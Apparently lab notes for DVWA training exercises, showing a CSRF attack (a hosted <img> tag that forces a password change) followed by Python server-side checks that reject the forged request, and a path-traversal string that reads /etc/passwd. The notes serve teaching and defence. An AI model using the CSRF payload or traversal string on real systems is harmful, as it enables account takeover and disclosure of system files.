DVWA Exercises 3
05 CSRF Attack

Let's type in a password and capture the request in Burp.

The attacker must prepare a website with a manipulated string. This attack only works if the victim is logged in to the target website (the session cookie must be valid) and clicks on the manipulated link.
Attacker's Side:
cd /home/hacker
mkdir webroot
python3 -m http.server 8001

Create an HTML file with the following content:
<img src="http://10.70.0.1/vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change">
Victim Side:
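The request above is accepted because the password change is reachable via GET and is authorised by the session cookie alone. The following is an added example (not part of the original exercise and not DVWA's own code) of the server-side checks that reject it; the key, the `csrf_token` field name, the session id and the `attacker.example` host are constructed assumptions.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SERVER_KEY = b"constructed-demo-key"   # assumption: per-deployment secret
TRUSTED_ORIGIN = "http://10.70.0.1"    # DVWA host used in the request above

def issue_token(session_id: str) -> str:
    """Token bound to the session; embedded only in the genuine form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def origin_of(url) -> str:
    """Reduce an Origin or Referer value to scheme://host[:port]."""
    parts = urlsplit(url or "")
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""

def check_password_change(req: dict) -> tuple:
    """Return (accepted, reason) for a password-change request."""
    if req["method"] != "POST":
        return False, "state change must not be reachable via GET"
    headers = req.get("headers", {})
    if origin_of(headers.get("Origin") or headers.get("Referer")) != TRUSTED_ORIGIN:
        return False, "cross-site or missing Origin/Referer"
    supplied = req["params"].get("csrf_token", "")  # hypothetical field name
    expected = issue_token(req["session_id"])
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    if req["params"].get("password_new") != req["params"].get("password_conf"):
        return False, "passwords do not match"
    return True, "ok"

# Constructed sample: what the browser sends when it loads the <img> tag.
# The session cookie rides along automatically, so session_id is valid.
FORGED = {
    "method": "GET", "session_id": "sess-constructed-1",
    "headers": {"Referer": "http://attacker.example:8001/page.html"},
    "params": {"password_new": "Secret1", "password_conf": "Secret1"},
}
# Constructed sample: the genuine form submission from the application itself.
GENUINE = {
    "method": "POST", "session_id": "sess-constructed-1",
    "headers": {"Origin": TRUSTED_ORIGIN},
    "params": {"password_new": "Secret1", "password_conf": "Secret1",
               "csrf_token": issue_token("sess-constructed-1")},
}

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("genuine", GENUINE)):
        print(name, check_password_change(req))
```

Setting `SameSite=Lax` or `Strict` on the session cookie adds a browser-side layer on top of these checks.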



06 File Inclusion


Attack string:
http://172.17.0.1/vulnerabilities/fi/?page=../../../../../etc/passwd
